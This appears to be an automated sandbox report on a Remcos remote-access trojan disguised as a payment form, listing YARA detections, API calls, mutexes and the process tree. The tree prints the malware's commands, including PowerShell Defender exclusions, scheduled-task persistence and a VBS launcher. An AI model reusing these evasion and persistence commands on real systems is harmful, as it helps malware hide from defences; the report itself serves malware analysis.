              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 4072, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 7380, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Payment Transfer Request Form.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: iKgKaogJ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: remcos.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, QwhKlmmQbOGs1vhvh6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, QwhKlmmQbOGs1vhvh6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, yCV0BKZVRAKIRjaruc.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, yCV0BKZVRAKIRjaruc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, yCV0BKZVRAKIRjaruc.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, yCV0BKZVRAKIRjaruc.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, yCV0BKZVRAKIRjaruc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, yCV0BKZVRAKIRjaruc.csSecurity API names: _0020.AddAccessRule
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@49/31@2/2
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,9_2_00415C90
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,9_2_0040E2E7
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,9_2_00419493
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_00418A00
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeFile created: C:\Users\user\AppData\Roaming\iKgKaogJ.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
              Source: C:\ProgramData\AppUpdate\remcos.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
              Source: C:\ProgramData\AppUpdate\remcos.exeMutant created: \Sessions\1\BaseNamedObjects\pTaQptBbLSFkRXHSYlA
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2320:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
              Source: C:\ProgramData\AppUpdate\remcos.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-VCJ8ZS
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmp854C.tmpJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
              Source: Payment Transfer Request Form.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Payment Transfer Request Form.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.drBinary or memory string: INSERT INTO [dbo].[CREDIT_PLAN] ([CREDIT_ID], [MATURITY_DATE], [MATURITY_SUM], [MATURITY_NOTE], [MODIF_DATE]) VALUES (@CREDIT_ID, @MATURITY_DATE, @MATURITY_SUM, @MATURITY_NOTE, @MODIF_DATE);
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.drBinary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE], [INTEREST]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE, @INTEREST);
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.drBinary or memory string: UPDATE [dbo].[Login] SET [User_id] = @User_id, [User_pass] = @User_pass WHERE (([User_id] = @Original_User_id) AND ([User_pass] = @Original_User_pass));
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.drBinary or memory string: UPDATE [dbo].[CREDIT_PLAN] SET [CREDIT_ID] = @CREDIT_ID, [MATURITY_DATE] = @MATURITY_DATE, [MATURITY_SUM] = @MATURITY_SUM, [MATURITY_NOTE] = @MATURITY_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([MATURITY_ID] = @Original_MATURITY_ID) AND ((@IsNull_CREDIT_ID = 1 AND [CREDIT_ID] IS NULL) OR ([CREDIT_ID] = @Original_CREDIT_ID)) AND ([MATURITY_DATE] = @Original_MATURITY_DATE) AND ([MATURITY_SUM] = @Original_MATURITY_SUM) AND ((@IsNull_MATURITY_NOTE = 1 AND [MATURITY_NOTE] IS NULL) OR ([MATURITY_NOTE] = @Original_MATURITY_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.drBinary or memory string: INSERT INTO [dbo].[PROD_PERIODS] ([PROD_CODE], [PROD_PERIOD]) VALUES (@PROD_CODE, @PROD_PERIOD);
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.drBinary or memory string: UPDATE [dbo].[INTEREST] SET [PROD_CODE] = @PROD_CODE, [PROD_PERIOD] = @PROD_PERIOD, [SUM_FROM] = @SUM_FROM, [SUM_TO] = @SUM_TO WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_PERIOD] = @Original_PROD_PERIOD) AND ([SUM_FROM] = @Original_SUM_FROM) AND ([SUM_TO] = @Original_SUM_TO));
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.drBinary or memory string: UPDATE [dbo].[CREDIT] SET [CREDIT_NO] = @CREDIT_NO, [CREDIT_DATE] = @CREDIT_DATE, [CREDIT_PERIOD] = @CREDIT_PERIOD, [CREDIT_END_DATE] = @CREDIT_END_DATE, [CREDIT_BEGIN_DATE] = @CREDIT_BEGIN_DATE, [CLIENT_ID] = @CLIENT_ID, [PROD_CODE] = @PROD_CODE, [CREDIT_SUM] = @CREDIT_SUM, [CREDIT_NOTE] = @CREDIT_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([CREDIT_ID] = @Original_CREDIT_ID) AND ([CREDIT_NO] = @Original_CREDIT_NO) AND ((@IsNull_CREDIT_DATE = 1 AND [CREDIT_DATE] IS NULL) OR ([CREDIT_DATE] = @Original_CREDIT_DATE)) AND ([CREDIT_PERIOD] = @Original_CREDIT_PERIOD) AND ((@IsNull_CREDIT_END_DATE = 1 AND [CREDIT_END_DATE] IS NULL) OR ([CREDIT_END_DATE] = @Original_CREDIT_END_DATE)) AND ((@IsNull_CREDIT_BEGIN_DATE = 1 AND [CREDIT_BEGIN_DATE] IS NULL) OR ([CREDIT_BEGIN_DATE] = @Original_CREDIT_BEGIN_DATE)) AND ([CLIENT_ID] = @Original_CLIENT_ID) AND ((@IsNull_PROD_CODE = 1 AND [PROD_CODE] IS NULL) OR ([PROD_CODE] = @Original_PROD_CODE)) AND ([CREDIT_SUM] = @Original_CREDIT_SUM) AND ((@IsNull_CREDIT_NOTE = 1 AND [CREDIT_NOTE] IS NULL) OR ([CREDIT_NOTE] = @Original_CREDIT_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.drBinary or memory string: UPDATE [dbo].[CREDIT_PRODUCT] SET [PROD_NAME] = @PROD_NAME, [PROD_ACTIVE] = @PROD_ACTIVE, [PROD_SUM_FROM] = @PROD_SUM_FROM, [PROD_SUM_TO] = @PROD_SUM_TO, [MODIF_DATE] = @MODIF_DATE WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_NAME] = @Original_PROD_NAME) AND ([PROD_ACTIVE] = @Original_PROD_ACTIVE) AND ([PROD_SUM_FROM] = @Original_PROD_SUM_FROM) AND ([PROD_SUM_TO] = @Original_PROD_SUM_TO) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmp, remcos.exe.9.dr, iKgKaogJ.exe.0.drBinary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE);
              Source: Payment Transfer Request Form.bat.exeReversingLabs: Detection: 52%
              Source: Payment Transfer Request Form.bat.exeVirustotal: Detection: 61%
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeFile read: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\iKgKaogJ.exe C:\Users\user\AppData\Roaming\iKgKaogJ.exe
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\AppUpdate\remcos.exe C:\ProgramData\AppUpdate\remcos.exe
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpAC9A.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: unknownProcess created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCD42.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: unknownProcess created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpED6C.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: unknownProcess created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCDB.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\AppUpdate\remcos.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\AppUpdate\remcos.exe C:\ProgramData\AppUpdate\remcos.exe
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\AppUpdate\remcos.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpAC9A.tmp"
              Source: C:\ProgramData\AppUpdate\remcos.exeProcess created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
